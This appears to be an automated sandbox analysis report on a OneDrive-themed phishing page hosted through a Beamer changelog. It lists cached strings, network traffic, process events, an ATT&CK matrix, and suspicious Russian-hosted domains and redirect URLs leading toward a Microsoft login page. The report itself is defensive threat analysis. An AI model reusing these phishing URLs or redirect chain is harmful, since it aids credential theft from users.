Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/bell-full.svg);border-radius:50%;color:#fff;padding-left:16px;paddi
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/close.svg);background-position:center;opacity:.3
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/images/favicon.ico
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/logo.svg)
Source: chromecache_123.2.drString found in binary or memory: https://app.getbeamer.com/images/logo.svg);
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/social/copy.svg
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/social/facebook.svg
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/social/linkedin.svg
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/social/share.svg
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/social/twitter.svg
Source: chromecache_135.2.drString found in binary or memory: https://app.getbeamer.com/images/social/whatsapp.svg
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/js/beamer.js?v=4
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/js/emoji.js?v=4
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/js/highlight.pack.js
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/js/human.js?v=2
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/js/jquery/jquery-3.6.0.min.js
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/js/mark.min.js
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/js/perfect-scrollbar.jquery.min.js
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/js/scroll.jquery.js
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/onedrivesecure/en
Source: chromecache_146.2.drString found in binary or memory: https://app.getbeamer.com/onedrivesecure/en/stillwell-hansen-thermal-parts-idIm9vr6
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/onedrivesecure/en?all
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/onedrivesecure/en?category=new
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/onedrivesecure/en?page=1
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/onedrivesecure/ideas/en
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/onedrivesecure/roadmap/en
Source: chromecache_146.2.drString found in binary or memory: https://app.getbeamer.com/pictures?id=458662-77-9a--_ve-_vVfvv70WFe-_vSrvv703Eu-_vX0c77-9TgVq77-977-
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/styles/highlight-js.css
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/styles/public.css?v=f2
Source: chromecache_148.2.drString found in binary or memory: https://app.getbeamer.com/styles/styles.css?v=3
Source: chromecache_122.2.dr, chromecache_105.2.drString found in binary or memory: https://git.io/vwTVl
Source: chromecache_135.2.drString found in binary or memory: https://gmetrics.getbeamer.com
Source: chromecache_133.2.dr, chromecache_107.2.drString found in binary or memory: https://gravatar.com/avatar/
Source: chromecache_102.2.dr, chromecache_118.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_102.2.dr, chromecache_118.2.drString found in binary or memory: https://login.windows-ppe.net
Source: chromecache_122.2.dr, chromecache_105.2.drString found in binary or memory: https://markjs.io/
Source: chromecache_132.2.dr, chromecache_131.2.drString found in binary or memory: https://static.getbeamer.com/emoji/
Source: chromecache_146.2.drString found in binary or memory: https://twitter.com/intent/tweet?text=Stillwell
Source: chromecache_146.2.drString found in binary or memory: https://wXXI.deripaud.ru/n682ZHUO/
Source: chromecache_148.2.drString found in binary or memory: https://www.getbeamer.com/
Source: chromecache_148.2.drString found in binary or memory: https://www.getbeamer.com/?ref=watermark_logo_yCPizuyh73191&company=One
Source: chromecache_148.2.drString found in binary or memory: https://www.getbeamer.com/?ref=watermark_yCPizuyh73191&company=One
Source: chromecache_148.2.drString found in binary or memory: https://www.getbeamer.com/?ref=watermark_yCPizuyh73191_public&amp;company=One
Source: chromecache_146.2.drString found in binary or memory: https://www.linkedin.com/shareArticle?source=Beamer&amp;mini=true&amp;title=Stillwell
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal60.phis.win@22/133@38/16
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1920,i,13882613665604877731,13674078214184280319,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.getbeamer.com/onedrivesecure/en"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1920,i,13882613665604877731,13674078214184280319,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://app.getbeamer.com/onedrivesecure/en0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.getbeamer.com/?ref=watermark_yCPizuyh73191&company=One0%Avira URL Cloudsafe
https://wxxi.deripaud.ru/favicon.ico0%Avira URL Cloudsafe
http://www.joincube.com0%Avira URL Cloudsafe
https://www.getbeamer.com/0%Avira URL Cloudsafe
https://7aopff8hhi2robm5gdfgzr8tt8v2krcgoy6uuy3lmhpmq5udo24.deryposi.ru/jlbzlotbmpcuyqcqkqspwLmyrpiRYUVCXKKIKYORDVCPXIACJHOKP100%Avira URL Cloudmalware
https://wXXI.deripaud.ru/n682ZHUO/0%Avira URL Cloudsafe
https://gmetrics.getbeamer.com0%Avira URL Cloudsafe
https://www.getbeamer.com/?ref=watermark_logo_yCPizuyh73191&company=One0%Avira URL Cloudsafe
http://www.getbeamer.com0%Avira URL Cloudsafe
https://www.getbeamer.com/?ref=watermark_yCPizuyh73191_public&amp;company=One0%Avira URL Cloudsafe
https://markjs.io/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
7aopff8hhi2robm5gdfgzr8tt8v2krcgoy6uuy3lmhpmq5udo24.deryposi.ru
188.114.96.3
truefalse
    high
    www.tm.ak.prd.aadg.trafficmanager.net
    40.126.32.138
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        e329293.dscd.akamaiedge.net
        2.23.227.223
        truefalse
          high
          b-0004.b-msedge.net
          13.107.6.156
          truefalse
            high
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              a1894.dscb.akamai.net
              88.221.110.211
              truefalse
                high
                code.jquery.com
                151.101.130.137
                truefalse
                  high
                  wxxi.deripaud.ru
                  172.67.177.125
                  truetrue
                    unknown
                    cdnjs.cloudflare.com
                    104.17.24.14
                    truefalse
                      high
                      challenges.cloudflare.com
                      104.18.94.41
                      truefalse
                        high
                        www.google.com
                        142.250.185.164
                        truefalse
                          high
                          app.getbeamer.com
                          104.26.2.186
                          truefalse
                            high
                            www.office.com
                            unknown
                            unknownfalse
                              high
                              identity.nel.measure.office.net
                              unknown
                              unknownfalse
                                high
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  login.microsoftonline.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://login.microsoftonline.com/false
                                      high
                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/905a5214bea60fa5/1737494138717/6bf0541b43570ad3980441987416a5ee4bb620a11eb8073a15fc09826493ef9e/l1Jl6s5G5VT2_AKfalse
                                          high
                                          https://wxxi.deripaud.ru/favicon.icofalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://app.getbeamer.com/js/jquery/jquery-3.6.0.min.jsfalse
                                            high
                                            https://app.getbeamer.com/js/human.js?v=2false
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/229508354:1737490429:Koj-nizuNayRNyfA2yiEx8JST4io9cxaGRsaFHqDhSU/905a5214bea60fa5/yno75hc7ItL03mdzF.tdrLCRaSSaRBvkkp6oEur_Y6g-1737494137-1.1.1.1-btbtN8gD8ICAgPFeu4Fponn3fU5U0mC0tbaABOQBq6NuAlYKOrS2pg5YZvMa87j6false
                                                high
                                                https://wxxi.deripaud.ru/n682ZHUO/?utm_source=beamer&utm_medium=standalone&utm_campaign=Stillwell-Hansen-Thermal-Parts&utm_content=textlinkfalse
                                                  unknown
                                                  https://app.getbeamer.com/styles/highlight-js.cssfalse
                                                    high
                                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                      high
                                                      https://app.getbeamer.com/fonts2/Lato-Normal-400b.woff2false
                                                        high
                                                        https://app.getbeamer.com/redirectTo?address=https%3A%2F%2FwXXI.deripaud.ru%2Fn682ZHUO%2F&descriptionId=95844714&product=yCPizuyh73191&origin=standalone&humanScore=50&userId=876d4375-575e-495b-ac98-b2829ba9249ffalse
                                                          high
                                                          https://app.getbeamer.com/fonts2/Lato-Normal-700b.woff2false
                                                            high
                                                            https://app.getbeamer.com/images/beamerIso.pngfalse
                                                              high
                                                              https://app.getbeamer.com/js/emoji.js?v=4false
                                                                high
                                                                https://app.getbeamer.com/images/social/share.svgfalse
                                                                  high
                                                                  https://app.getbeamer.com/js/mark.min.jsfalse
                                                                    high
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/905a5214bea60fa5/1737494138722/9f3y4b8VlM8-_kFfalse
                                                                      high
                                                                      https://app.getbeamer.com/styles/styles.css?v=3false
                                                                        high
                                                                        https://7aopff8hhi2robm5gdfgzr8tt8v2krcgoy6uuy3lmhpmq5udo24.deryposi.ru/jlbzlotbmpcuyqcqkqspwLmyrpiRYUVCXKKIKYORDVCPXIACJHOKPfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                                          high
                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/egw9b/0x4AAAAAAA3OmVPC4MkMilKk/auto/fbE/new/normal/auto/false
                                                                            high
                                                                            https://app.getbeamer.com/js/beamer.js?v=4false
                                                                              high
                                                                              https://challenges.cloudflare.com/turnstile/v0/g/672eb098a9f3/api.jsfalse
                                                                                high
                                                                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                                                  high
                                                                                  https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                                                    high
